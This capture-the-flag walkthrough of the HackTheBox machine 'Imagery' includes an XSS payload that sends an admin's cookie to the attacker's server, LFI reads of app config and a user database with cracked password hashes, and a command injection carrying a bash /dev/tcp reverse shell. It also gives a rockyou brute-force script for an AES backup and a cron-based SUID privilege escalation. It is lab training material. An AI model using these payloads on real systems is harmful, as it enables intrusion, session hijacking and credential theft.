Imagery
Linux Medium Box from HackTheBox Season 9 (2/13)
Recon
As always, we start off by performing a TCP port scan using nmap
nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -vvv -oN scan 10.129.193.255# Nmap 7.95 scan initiated Sun Sep 28 11:14:37 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -vvv -oN scan 10.129.193.255
Nmap scan report for 10.129.193.255
Host is up, received user-set (0.043s latency).
Scanned at 2025-09-28 11:14:37 WEST for 21s
Not shown: 60067 closed tcp ports (reset), 5466 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKyy0U7qSOOyGqKW/mnTdFIj9zkAcvMCMWnEhOoQFWUYio6eiBlaFBjhhHuM8hEM0tbeqFbnkQ+6SFDQw6VjP+E=
| 256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBleYkGyL8P6lEEXf1+1feCllblPfSRHnQ9znOKhcnNM
8000/tcp open http syn-ack ttl 63 Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-title: Image Gallery
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 28 11:14:58 2025 -- 1 IP address (1 host up) scanned in 21.12 secondsWe see that TCP Port 22 | SSH and TCP Port 800 | HTTP-ALT are open, this one running on Werkzeug 3.1.3 which is a web application that runs on python
let's check what's inside the website running on TCP Port 8000
We see that we can register as well, after the registration we see a new dashboard where we can upload images
But nothing appears to be injectable for now here
From here, after applying some lateral thinking we notice a weird endpoint at the bottom of the webpage:
Here we see a report form, and if we send it:
As we can see, the Admin is going to review our form that we sent, this gives us a clear hint on what we need to do next.
Stored / Persistent XSS on Report Bug Form
We need to send a malicious XSS payload that retrieves the admin's cookies to our local server after he loads the payload, hence showing us the cookies explicitly.
We're going to use the following payload:
<img src=1 onerror="document.location='http://IP:PORT/a/'+ document.cookie"><\img>And in our Python HTTP Server we see the following output
❯ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.193.255 - - [28/Sep/2025 11:38:05] code 404, message File not found
10.129.193.255 - - [28/Sep/2025 11:38:05] "GET /a/session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aNkQEQ.0Jwud8-uYfaHRvEM_Cidpdv9bzI HTTP/1.1" 404 -
10.129.193.255 - - [28/Sep/2025 11:38:05] code 404, message File not found
10.129.193.255 - - [28/Sep/2025 11:38:05] "GET /favicon.ico HTTP/1.1" 404 -Which outputs the session cookie of the Admin User, so we hijack the cookies using Firefox
But after trying to access the admin panel the website crashes by redirecting us to the
http://10.10.14.102/a/session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aNkQEQ.0Jwud8-uYfaHRvEM_Cidpdv9bzIThis happens because we're getting the reflected XSS to fix this we're going to use burp-suite's intercept so we control which requests are forwarded or not
And now we're able to see the admin panel properly
LFI in get_system_log
After inspecting a bit, we see that when we try to use the Download Log function it tries to retrieve a file from the system, hence giving us hint on what we should do, in this case, performing an LFI (Local File Inclusion) so we send this request to burp's repeater with Ctrl + R and try to look for arbitrary files on the system (e.g ../../../../etc/passwd)
And voilah, we succeeded at the LFI
After enumerating some more we don't see any SSH Key( id_rsa) that we can enumerate, so as we know this is running on Werkzeug and the system has a web user
Web Backend Enumeration
Let's try to enumerate his current directory with the use of /proc/self/cwd/ which is a symbolic link of the CWD (current working directory) of the user running the web, in this case: web
Let's try to look for the app.py file as it's in most of the web servers running on Werkzeug
This helps us understand how everything is working at a better glance, it's importing stuff content config which means that a config.py file is available, same goes for utils.py
Let's try to enumerate the config.py file and see what it contains
We see that data is stored at a file called db.json and after enumerating that file with the same process we get the following output:
--------------- SNIP ------------
{
"users": [
{
"username": "admin@imagery.htb",
"password": "5d9c1d507a3f76af1e5c97a3ad1eaa31",
"isAdmin": true,
"displayId": "a1b2c3d4",
"login_attempts": 0,
"isTestuser": false,
"failed_login_attempts": 0,
"locked_until": null
},
{
"username": "testuser@imagery.htb",
"password": "2c65c8d7bfbca32a3ed42596192384f6",
"isAdmin": false,
"displayId": "e5f6g7h8",
"login_attempts": 0,
"isTestuser": true,
"failed_login_attempts": 0,
"locked_until": null
}
--------------- SNIP ------------So we got a md5 hash for the testuser and the admin user!! let's crack them with crackstation
2c65c8d7bfbca32a3ed42596192384f6:iambatmanBackend code review
We've got access to the testuser so login through the web to it:
And after uploading an image and accessing to the Gallery dashboard, we see that we've got some options that are not blanked anymore
Remember that we got full access to the web backend? Let's try to enumerate from these functions from app.py as we did earlier but with the focus to to audit the code and potentially find attack vectors
We see that it's importing the os library which gives us a hint: It's executing system commands, we also see both api_manage and api_edit which could be related to the options we saw earlier in the Gallery dashboard
After carefully inspecting the code, we don't seem to find anything in api_manage.py
In the other hand, api_edit.py crop function seems vulnerable to command injection
if transform_type == 'crop':
x = str(params.get('x'))
y = str(params.get('y'))
width = str(params.get('width'))
height = str(params.get('height'))
command = f"{IMAGEMAGICK_CONVERT_PATH} {original_filepath} -crop {width}x{height}+{x}+{y} {output_filepath}"
subprocess.run(command, capture_output=True, text=True, shell=True, check=True)constructs a shell command using untrusted input and executes it with shell=True This allows us to take control of the interpolated values e.g x, y, width, height to inject shell commands and execute arbitrary commands as the web process user.
Foothold: Command Injection
So let's intercept the crop function on the web with burp and send it to repeater
As we can see the code is reflecting, showing us web as the user with the command whoami,
now let's execute a Bash TCP Reverse shell with the following payload
$(bash -c 'bash -i >& /dev/tcp/10.10.x.x/PORT 0>&1')And set up our listener with netcat so we receive the reverse shell
❯ nc -lvnp 1920
Listening on 0.0.0.0 1920
Connection received on 10.129.193.255 42310
bash: cannot set terminal process group (1390): Inappropriate ioctl for device
bash: no job control in this shell
web@Imagery:~/web$ AES Decrypt Script Development
After a lot of enumeration we see a AES Encrypted file on the /var/backup directory
web@Imagery:~/web$ ls /var/backup
web_20250806_120723.zip.aesSo let's transfer it to our local host and try to crack it
The AES encryption method needs a passphrase to crack it, so we're going to develop a python script that brute-forces this passpharse with the use of the rockyou.txt wordlist and then decrypts the file itself with the pyAesCrypt module:
import pyAesCrypt
import os
import sys
def decrypt_with_password(encrypted_file, output_file, password, buffer_size=64*1024):
"""Attempt to decrypt a file with given password"""
try:
pyAesCrypt.decryptFile(encrypted_file, output_file, password, buffer_size)
# Check if the output file was actually created and has content
if os.path.exists(output_file) and os.path.getsize(output_file) > 0:
return True
else:
# Clean up empty file if decryption failed but no exception was raised
if os.path.exists(output_file):
os.remove(output_file)
return False
except ValueError as e:
# This exception is raised when the password is incorrect or file is corrupted
if "Wrong password" in str(e) or "Corrupted file" in str(e):
return False
else:
print(f"Unexpected ValueError with password '{password}': {e}")
return False
except Exception as e:
print(f"Unexpected error with password '{password}': {e}")
return False
def main():
# File paths
encrypted_file = "web_20250806_120723.zip.aes"
output_file = "web_20250806_120723.zip"
wordlist_path = "/usr/share/seclists/rockyou.txt"
# Check if files exist
if not os.path.exists(encrypted_file):
print(f"Error: Encrypted file '{encrypted_file}' not found!")
return
if not os.path.exists(wordlist_path):
print(f"Error: Wordlist '{wordlist_path}' not found!")
return
# Buffer size
buffer_size = 64 * 1024
print(f"Attempting to decrypt '{encrypted_file}' using passwords from '{wordlist_path}'")
print("This may take a while...\n")
# Try passwords from the wordlist
passwords_tried = 0
try:
with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as f:
for password in f:
password = password.strip()
# Skip empty lines
if not password:
continue
passwords_tried += 1
# Print progress every 1000 attempts
if passwords_tried % 1000 == 0:
print(f"Tried {passwords_tried} passwords... Current: '{password}'")
# Try to decrypt with current password
if decrypt_with_password(encrypted_file, output_file, password, buffer_size):
print(f"\n[SUCCESS] Password found: '{password}'")
print(f"File decrypted as: '{output_file}'")
print(f"Total passwords tried: {passwords_tried}")
return
except KeyboardInterrupt:
print(f"\n\nProcess interrupted by user after trying {passwords_tried} passwords.")
return
except Exception as e:
print(f"\nError: {e}")
return
print(f"\n[FAILURE] Password not found in the wordlist. Tried {passwords_tried} passwords.")
if __name__ == "__main__":
main()So first off we activate the python venv and install the pyAesCrypt library
❯ python3 -m venv .env && source .env/bin/activate && pip3 install pyAesCryptAnd finally we execute
❯ python3 decrypt.py
Attempting to decrypt 'web_20250806_120723.zip.aes' using passwords from '/usr/share/seclists/rockyou.txt'
This may take a while...
[SUCCESS] Password found: 'bestfriends'
File decrypted as: 'web_20250806_120723.zip'
Total passwords tried: 670We successfully cracked the AES file and the passphrase is: bestfriends so we unzip the file
unzip web_20250806_120723.zipAnd we see that it's a web backup and after enumerating a bit we notice that the db.json file now also contains the mark user password hash
{
"username": "mark@imagery.htb",
"password": "01c3d2e5bdaf6134cec0a367cf53e535",
"displayId": "868facaf",
"isAdmin": false,
"failed_login_attempts": 0,
"locked_until": null,
"isTestuser": false
},
{So we crack it with crackstation as we did with testuser earlier:
01c3d2e5bdaf6134cec0a367cf53e535:supersmashPrivilege Escalation: Abusing Charcol
web@Imagery:/var/backup$ su mark
Password: supersmash
mark@Imagery:/var/backup$ We see that the credential successfully worked so it's time to escalate to the root user
And after some enumeration we see this
mark@Imagery:/var/backup$ sudo -l
Matching Defaults entries for mark on Imagery:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User mark may run the following commands on Imagery:
(ALL) NOPASSWD: /usr/local/bin/charcol
mark@Imagery:/var/backup$ We try execute it
mark@Imagery:/var/backup$ sudo /usr/local/bin/charcol
░██████ ░██ ░██
░██ ░░██ ░██ ░██
░██ ░████████ ░██████ ░██░████ ░███████ ░███████ ░██
░██ ░██ ░██ ░██ ░███ ░██ ░██ ░██ ░██ ░██
░██ ░██ ░██ ░███████ ░██ ░██ ░██ ░██ ░██
░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██
░██████ ░██ ░██ ░█████░██ ░██ ░███████ ░███████ ░██
Charcol The Backup Suit - Development edition 1.0.0
Charcol is already set up.
To enter the interactive shell, use: charcol shell
To see available commands and flags, use: charcol help
mark@Imagery:/var/backup$ So we try to check the help manual using --help
mark@Imagery:/var/backup$ sudo /usr/local/bin/charcol --help
usage: charcol.py [--quiet] [-R] {shell,help} ...
Charcol: A CLI tool to create encrypted backup zip files.
positional arguments:
{shell,help} Available commands
shell Enter an interactive Charcol shell.
help Show help message for Charcol or a specific command.
options:
--quiet Suppress all informational output, showing only
warnings and errors.
-R, --reset-password-to-default
Reset application password to default (requires system
password verification).
mark@Imagery:/var/backup$ As we see, we can reset the password to it's default using the -R parameter, so let's try to do it
mark@Imagery:/var/backup$ sudo charcol -R
Attempting to reset Charcol application password to default.
[2025-09-28 12:19:44] [INFO] System password verification required for this operation.
Enter system password for user 'mark' to confirm:
[2025-09-28 12:19:48] [INFO] System password verified successfully.
Removed existing config file: /root/.charcol/.charcol_config
Charcol application password has been reset to default (no password mode).
Please restart the application for changes to take effect.
mark@Imagery:/var/backup$ sudo charcol shell
First time setup: Set your Charcol application password.
Enter '1' to set a new password, or press Enter to use 'no password' mode:
Are you sure you want to use 'no password' mode? (yes/no): yes
[2025-09-28 12:19:58] [INFO] Default application password choice saved to /root/.charcol/.charcol_config
Using 'no password' mode. This choice has been remembered.
Please restart the application for changes to take effect.
mark@Imagery:/var/backup$ sudo charcol shell
░██████ ░██ ░██
░██ ░░██ ░██ ░██
░██ ░████████ ░██████ ░██░████ ░███████ ░███████ ░██
░██ ░██ ░██ ░██ ░███ ░██ ░██ ░██ ░██ ░██
░██ ░██ ░██ ░███████ ░██ ░██ ░██ ░██ ░██
░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██
░██████ ░██ ░██ ░█████░██ ░██ ░███████ ░███████ ░██
Charcol The Backup Suit - Development edition 1.0.0
[2025-09-28 12:20:03] [INFO] Entering Charcol interactive shell. Type 'help' for commands, 'exit' to quit.
charcol> Now we got access to the charcol shell and after typing help a help manual appears on the output
Something catches our attention instantly
Automated Jobs (Cron):
auto add --schedule "<cron_schedule>" --command "<shell_command>" --name "<job_name>" [--log-output <log_file>]
Purpose: Add a new automated cron job managed by Charcol.You can summon a cron job that spawns a shell command, and this is executed as root
Let's try to change the /bin/bash permissions so we can access a privleged bash
charcol> auto add --schedule "* * * * *" --command "chmod u+s /bin/bash" --name "privesc"
[2025-09-28 12:23:57] [INFO] System password verification required for this operation.
Enter system password for user 'mark' to confirm:
[2025-09-28 12:24:00] [INFO] System password verified successfully.
[2025-09-28 12:24:00] [INFO] Auto job 'privesc' (ID: 9ff73c4c-233f-4205-b9d0-dc7aabf0d8d8) added successfully. The job will run according to schedule.
[2025-09-28 12:24:00] [INFO] Cron line added: * * * * * CHARCOL_NON_INTERACTIVE=true chmod u+s /bin/bashAnd if we do
mark@Imagery:/var/backup$ bash -p
bash-5.2# whoami
root
bash-5.2# We get a shell as the root user!
Thank you for reading this writeup, I hope it helped a lot and see you next time!
Last updated